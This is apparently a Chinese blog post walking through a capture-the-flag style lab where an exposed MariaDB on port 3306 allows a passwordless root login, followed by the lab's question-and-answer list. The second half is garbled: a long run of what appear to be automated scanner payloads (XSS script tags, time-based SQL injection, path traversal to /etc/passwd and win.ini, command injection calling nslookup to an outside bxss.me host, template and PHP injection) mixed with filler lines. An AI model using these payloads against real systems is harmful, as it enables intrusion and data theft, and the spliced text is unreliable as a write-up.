很久没更新了,我今天又来水文章了,虽然没人看hh
1.每次都给个ip就只能nmap起手了 
2.只开放了3306 端口,话不多说先爆弱口令
3.没爆破出来,emm 试一下直接连接
4.直接冲 flag 到手
5.问题及答案
1.What does the acronym SQL stand for?
-> Structured Query Language
2.During our scan, which port running mysql do we find?
-> 3306
3.What community-developed MySQL version is the target running?
-> MariaDB
4.What switch do we need to use in order to specify a login username for the MySQL service?
-> -u
5.Which username allows us to log into MariaDB without providing a password?
-> root
6.What symbol can we use to specify within the query that we want to display eveything inside a table?
-> *
7.What symbol can we use to specify within the query that we want to display eveything inside a table?
-> ;
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1Xexxf
<ScRiPt >lMah(9971)</ScRiPt>
1u003CScRiPtlMah(9786)u003C/sCripTu003E
1
1<body onload=lMah(9945)>
1
1
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6C%4D%61%68%28%39%31%32%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<WZTOF3>MUYJV[!+!]</WZTOF3>
1<ScRiPt >lMah(9534)</ScRiPt>
1
<th:t="${dfb}#foreach
1
1
bfgx7973%C0%BEz1%C0%BCz2a%90bcxhjl7973
bfg6162%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6162
19926191
'"()&%<zzz><ScRiPt >lMah(9838)</ScRiPt>
1'"()&%<zzz><ScRiPt >lMah(9169)</ScRiPt>
6L1iS6gB' OR 536=(SELECT 536 FROM PG_SLEEP(15))--
-1)) OR 462=(SELECT 462 FROM PG_SLEEP(15))--
-5 OR 92=(SELECT 92 FROM PG_SLEEP(15))--
-1); waitfor delay '0:0:15' --
-1 OR 2+412-412-1=0+0+0+1 --
1
1
1
1
1
1
1
19545491
'"()&%<zzz><ScRiPt >8l6E(9540)</ScRiPt>
";print(md5(31337));$a="
1
'.gethostbyname(lc('hitei'.'uflpafuba9414.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(79).chr(118).chr(85).'
1
1
1Bq9RLSFHVO
1
1
-1' OR 2+852-852-1=0+0+0+1 --
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
YxQzMWc3')) OR 705=(SELECT 705 FROM PG_SLEEP(15))--
pR9Cd2ry' OR 230=(SELECT 230 FROM PG_SLEEP(15))--
-1)) OR 365=(SELECT 365 FROM PG_SLEEP(15))--
1 waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-1' OR 2+857-857-1=0+0+0+1 --
-1 OR 2+756-756-1=0+0+0+1 --
1
1
1
${@print(md5(31337))}
1
1
c:/windows/win.ini
1
bxss.me/t/xss.html?%00
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
................windowswin.ini
1
(nslookup hitaeoeewwjsk3624d.bxss.me||perl -e "gethostbyname('hitaeoeewwjsk3624d.bxss.me')")
|(nslookup hitfgfbasbxsrc7330.bxss.me||perl -e "gethostbyname('hitfgfbasbxsrc7330.bxss.me')")
../../../../../../../../../../etc/passwd%00.jpg
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
../1
1
"+response.write(9541828*9311247)+"
'+response.write(9541828*9311247)+'
1
1
1
1
1
1
-1 OR 2+975-975-1=0+0+0+1 --
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Un96tMoe' OR 364=(SELECT 364 FROM PG_SLEEP(15))--
1
1
'"()&%<zzz><ScRiPt >NftV(9795)</ScRiPt>
1
zBxaR942
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1